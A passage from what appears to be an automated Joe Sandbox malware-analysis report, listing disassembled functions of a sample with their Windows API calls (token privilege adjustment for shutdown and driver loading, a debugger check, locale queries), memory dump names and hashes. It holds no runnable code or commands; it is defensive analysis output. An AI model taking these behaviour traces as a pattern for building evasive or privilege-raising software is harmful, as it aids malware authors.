                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                          • String ID: Norwegian-Nynorsk
                                                                                          • API String ID: 3475089800-461349085
                                                                                          • Opcode ID: 2cdfa383db7a5364afec4a5bea0e215fc78a568d75881a5c966e946e4fb3c64d
                                                                                          • Instruction ID: 3a7a93a38f069acdadfa2479906f1f97261035475881df31c1158597420056e6
                                                                                          • Opcode Fuzzy Hash: 2cdfa383db7a5364afec4a5bea0e215fc78a568d75881a5c966e946e4fb3c64d
                                                                                          • Instruction Fuzzy Hash: 7951C3716C0313ABEB285F31CCADBA77BA6BF04740F098525E9489B2D1D7B4DC91C6A1
                                                                                          Function 005A8380 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 127comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 005A83BC
                                                                                          • CoCreateInstance.OLE32(0061B4B8,00000000,00000001,0061B4D4,?), ref: 005A8402
                                                                                          • CoUninitialize.OLE32 ref: 005A84DD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                          • String ID: Disabled $Enabled $Removed
                                                                                          • API String ID: 948891078-2230107431
                                                                                          • Opcode ID: 23bd88dbf85b549e6bbf16d439f114f44acef104b1e84d424d031be4f8949a64
                                                                                          • Instruction ID: 8b8c69d56037294177cf85422aec4752aa4abe346013d744b35528b1a3f5eb15
                                                                                          • Opcode Fuzzy Hash: 23bd88dbf85b549e6bbf16d439f114f44acef104b1e84d424d031be4f8949a64
                                                                                          • Instruction Fuzzy Hash: E441BF71D04209DFDF20DF54DC85EAEBBB5FB49708F1845A9E90A63241DB70AE44CBA1
                                                                                          Function 005D4420 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005D4459
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005D4460
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005D4475
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005D4499
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 005D44A3
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentExitLoadLookupOpenPrivilegePrivilegesStringValueWindowswvsprintf
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 4148835054-3733053543
                                                                                          • Opcode ID: 2964dfa9966921b0172a1c4911ef5ca8a4d37014c2ab4c8acafb2051372b2009
                                                                                          • Instruction ID: e4b0b0fa1349f47730802ba02065f9382dacbbadeaf31c64cfde78850092433e
                                                                                          • Opcode Fuzzy Hash: 2964dfa9966921b0172a1c4911ef5ca8a4d37014c2ab4c8acafb2051372b2009
                                                                                          • Instruction Fuzzy Hash: 6D016170A40309AFEB10DF94DC5EBED7B79AB08701F14801AB606A62D0DAB05584CB62
                                                                                          Function 005AEAB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005AEAC6
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005AEACD
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 005AEAE2
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005AEB06
                                                                                          • CloseHandle.KERNEL32(?), ref: 005AEB10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeLoadDriverPrivilege
                                                                                          • API String ID: 3038321057-497486668
                                                                                          • Opcode ID: 86915c4014109782533c5c4ce374e30fc129e3e84865b83e335b39e907216e3a
                                                                                          • Instruction ID: fb7089c75190e51c181d9ba0323292aec75b75463bc492a94d163ee3bfedb8bd
                                                                                          • Opcode Fuzzy Hash: 86915c4014109782533c5c4ce374e30fc129e3e84865b83e335b39e907216e3a
                                                                                          • Instruction Fuzzy Hash: EC016270A00309AFD700DFD0CC5EFEE7B79EB48701F044049B605A61C0DBB06544CBA1
                                                                                          Function 0060C0DC Relevance: 9.2, APIs: 6, Instructions: 156memoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005FA89A: SetFilePointer.KERNEL32(00000000,00BFBBEF,00000003,00000010,00BFBBEF,00BFBBEF,00605FC8,00605FC8,?,005EDF50,00BFBBEF,00000000,00000000,00000002,005B06CD,00000000), ref: 005FA8DC
                                                                                            • Part of subcall function 005FA89A: GetLastError.KERNEL32(?,005EDF50,00BFBBEF,00000000,00000000,00000002,005B06CD,00000000,005B06CD,?,005EE60F,005B06CD,00000000,00070000,00633068,00000010), ref: 005FA8E9
                                                                                          • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109,00000000), ref: 0060C145
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109,00000000), ref: 0060C14C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92), ref: 0060C1C8
                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109), ref: 0060C1CF
                                                                                          • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92), ref: 0060C22A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,00605D92,00000109), ref: 0060C257
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                          • String ID:
                                                                                          • API String ID: 1354853467-0
                                                                                          • Opcode ID: c1dc19e33ac7f7fd36095980af9d9d083dbafd2211a95d2aff5a1d436cf9dbcc
                                                                                          • Instruction ID: cd4d14b78e3f3a107d49c4cafb52766951b20b27e167585ff54c98283fbda255
                                                                                          • Opcode Fuzzy Hash: c1dc19e33ac7f7fd36095980af9d9d083dbafd2211a95d2aff5a1d436cf9dbcc
                                                                                          • Instruction Fuzzy Hash: 6441E472980509AFDF192FB88C499AE7F63FB44334F148765F934A62E1D6308D429B61
                                                                                          Function 00602744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602783
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 006027AC
                                                                                          • GetACP.KERNEL32(?,?,00602DAD,?,005F3632,?,000000BC,?,00000001,00000000), ref: 006027C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 3fe89e87794b8e0b21471b8f8881c574cb7dcf1140bfd4620ea9f48014f823b0
                                                                                          • Instruction ID: 862e9ea556a02687357696e324084c1428f9c1eff0c0cced236b3c2026a213ed
                                                                                          • Opcode Fuzzy Hash: 3fe89e87794b8e0b21471b8f8881c574cb7dcf1140bfd4620ea9f48014f823b0
                                                                                          • Instruction Fuzzy Hash: 7401D43068070BBBEB29DB60ED69FDB7BABAF00758F144015F501E11D1EB70CA41D654
                                                                                          Function 005E82B3 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 005EFA2B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005EFA40
                                                                                          • UnhandledExceptionFilter.KERNEL32(0062B7A0), ref: 005EFA4B
                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 005EFA67
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 005EFA6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 2579439406-0
                                                                                          • Opcode ID: ede2d9a6f291e03b1feefee306642528d18bd7a0be93822ede07696921a22152
                                                                                          • Instruction ID: 985c61303ed7ebdb3c545afa9d1637d403f549daeba92bfbd3ad4a21b7327282
                                                                                          • Opcode Fuzzy Hash: ede2d9a6f291e03b1feefee306642528d18bd7a0be93822ede07696921a22152
                                                                                          • Instruction Fuzzy Hash: 192107B84913069FC785DF15FC656843BB2FB4A304FE0601AF909872B0E7705989CF55
                                                                                          Function 005F6474 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005F64CC
                                                                                            • Part of subcall function 005F5B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 005F5B3B
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 005F65A9
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 005F65C9
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 005F6605
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLastSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1708069870-0
                                                                                          • Opcode ID: b28490e514104ede47f7a0b29478e2f3ec50993410fb5981a29d08a513be280d
                                                                                          • Instruction ID: dd64a874a0d49c7e6d71c9ba762424771a6652ca1c3f9e76c852374d8982f7d5
                                                                                          • Opcode Fuzzy Hash: b28490e514104ede47f7a0b29478e2f3ec50993410fb5981a29d08a513be280d
                                                                                          • Instruction Fuzzy Hash: 3D41BD7190021EAFEF219F258C15BBB3FAAFF44310F5484A9FA44A3145EB39CE508B60
                                                                                          Function 005AC060 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(000F01FF), ref: 005AC08D
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005AC094
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005AC0A5
                                                                                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005AC0C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID:
                                                                                          • API String ID: 2349140579-0
                                                                                          • Opcode ID: 0057f1b0c69214a656feccdd23855f358790d974b044c1a56130a6bc00860c6a
                                                                                          • Instruction ID: 54fd510d0540d1497b6fd62646838f8cc232be1fbeeda7f858969f9748ca3641
                                                                                          • Opcode Fuzzy Hash: 0057f1b0c69214a656feccdd23855f358790d974b044c1a56130a6bc00860c6a
                                                                                          • Instruction Fuzzy Hash: 150129B2600208ABD710DF94DC49BAABBBDFB48701F10441EFA0597280DBB06904CBB1
                                                                                          Function 005F0EEB Relevance: 4.8, APIs: 3, Instructions: 269timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • GetTimeZoneInformation.KERNEL32(00643200,00000000,00000000,00000000,00000000,00000000,00633218,0000002C,005F15FA,00633238,00000008,005E8928,?,?,00000000,?), ref: 005F1014
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00643204,?,?,0000003F,00000000,?), ref: 005F1092
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00643258,000000FF,00000003,0000003F,00000000,?), ref: 005F10C6
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                          • String ID:
                                                                                          • API String ID: 1184061189-0
                                                                                          • Opcode ID: 8ce3ac9604f4077e2bd5adb0c18d51f9ad37605159912c13f05afe8a53d59a0d
                                                                                          • Instruction ID: 41cf87969559daa80f561524fcb625be25316a211b3b99e785d1d5d61f345536
                                                                                          • Opcode Fuzzy Hash: 8ce3ac9604f4077e2bd5adb0c18d51f9ad37605159912c13f05afe8a53d59a0d
                                                                                          • Instruction Fuzzy Hash: 5791A17190069EDFDB20AFA5D8859BEBFB9BF55310B14502AE340E7291D7388E41CB68
                                                                                          Function 0060293B Relevance: 4.7, APIs: 3, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602986
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 006029C7
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602A6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 1d95d57e147b4505a7e8269ce6a9b2804c28ff95b642cf595de90d1fd2b49464
                                                                                          • Instruction ID: 5de7e9192f3064eacd1a85c670537ed798ee1caebf242e9f2c16d55b75de1b91
                                                                                          • Opcode Fuzzy Hash: 1d95d57e147b4505a7e8269ce6a9b2804c28ff95b642cf595de90d1fd2b49464
                                                                                          • Instruction Fuzzy Hash: 1151DB71A80B039FDB38DF65CC95AA7B7EAEF44310B20842DE496C26D1DB74E8458B10
                                                                                          Function 006086E2 Relevance: 4.6, APIs: 3, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080), ref: 00608712
                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000080), ref: 0060877B
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00000000,00000000,00000000,?,?,?,?,?,00000080), ref: 00608799
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1691099609-0
                                                                                          • Opcode ID: b5ca2541e966d0e685d728fe230361f87be41672b29af336c158e4b00c8c7090
                                                                                          • Instruction ID: 38dc0cd5afc44264f7f30d6c073e5250b103919e59eb8c5f186dadd521b6534d
                                                                                          • Opcode Fuzzy Hash: b5ca2541e966d0e685d728fe230361f87be41672b29af336c158e4b00c8c7090
                                                                                          • Instruction Fuzzy Hash: DD21E131600224AFCF29DF65CC84CEF7FAAEF897A0B244021F559D7294CA308C11CAA0
                                                                                          Function 005AC0F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,?,00000000,00000000,?,005AD67C,0000025E,cant create events), ref: 005AC10C
                                                                                          • CloseHandle.KERNEL32(?,?,005AD67C,0000025E,cant create events), ref: 005AC115
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          • Opcode ID: b55c8ef8a9250cd2b994d8bd38a50933d9386666dc98608beaa820f22e223b09
                                                                                          • Instruction ID: fb7c72d347251afb1dcbdb7c8606aa6c9ecdf0422080fa3d729a143d06365f20
                                                                                          • Opcode Fuzzy Hash: b55c8ef8a9250cd2b994d8bd38a50933d9386666dc98608beaa820f22e223b09
                                                                                          • Instruction Fuzzy Hash: 3BE0E2B1300610ABE7388F24AC95FA67BEDAF08B11F14491EB986D6180CB64E840CA64
                                                                                          Function 00602B0C Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 00602B50
                                                                                          Memory Dump Source
